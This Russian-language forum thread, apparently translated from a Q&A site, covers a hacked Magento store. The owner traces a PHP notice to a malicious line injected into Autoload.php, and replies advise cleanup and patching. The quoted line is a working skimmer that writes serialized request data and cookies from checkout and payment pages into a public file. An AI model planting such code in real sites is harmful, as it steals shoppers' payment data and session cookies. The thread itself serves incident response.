С этого утра я получаю следующее
Уведомление PHP после запуска cronjob Magento:
Неопределенный индекс: REQUEST_URI в /htdocs/lib/Varien/Autoload.php в
строка 1
Я не модифицировал ни один из файлов мага .. Как это возможно?
РЕДАКТИРОВАТЬ:
На данный момент я отредактировал Autoload.php, чтобы сначала проверить, установлен ли REQUEST_URI.
Оригинал:
<?php if(preg_match("/checkout|payment/", $_SERVER["REQUEST_URI"]))
Новое:
<?php if(isset($_SERVER["REQUEST_URI"]) && preg_match("/checkout|payment/", $_SERVER["REQUEST_URI"]))
РЕДАКТИРОВАТЬ 30-04-2015:
После прочтения комментариев @volkan и @ b.enoit.be я немедленно заменил указанную страницу оригинальной страницей от Magento, и строка действительно отсутствовала !.
Ниже приведена вредоносная строка, присутствующая в Autoload.php
<?php if(preg_match("/checkout|payment/", $_SERVER["REQUEST_URI"])){@file_put_contents(realpath("./")."/media/catalog/product/cache_catalogs", @base64_encode(serialize($_REQUEST)."--".serialize($_COOKIE)). ":", FILE_APPEND); }?>
Я также проверил:
Однако … появилось два новых администратора-пользователя с непонятными именами:
Оба пользователя были удалены.
Веб-сайт также был уязвим для эксплойта магазина (который рассматривается в последнем патче безопасности)
В настоящее время мы заняты установкой последних исправлений безопасности.
Кажется, что это была недавняя проблема:
100 000 интернет-магазинов открыты для компромисса, поскольку злоумышленники используют ошибку Magento
Magento Shoplift Bug Tester v1.0
Спасибо всем пользователям за помощь.
похоже, что ваша страница была взломана, замените файл на исходный и установите исправления безопасности для magento. Проверьте, есть ли какие-либо новые администраторы в бэкэнде и для модуля Magpleasure_Filesystem
проверьте также
/js/index.php
/index.php
Это определенно скомпрометированный файл.
Если кто-то еще сталкивается с той же проблемой, media/catalog/product/cache_catalogs
Файл также должен быть удален, потому что он содержит конфиденциальные данные (запросы и данные cookie-файлов со страниц оформления заказа или оплаты) и является общедоступным (в media/
папка).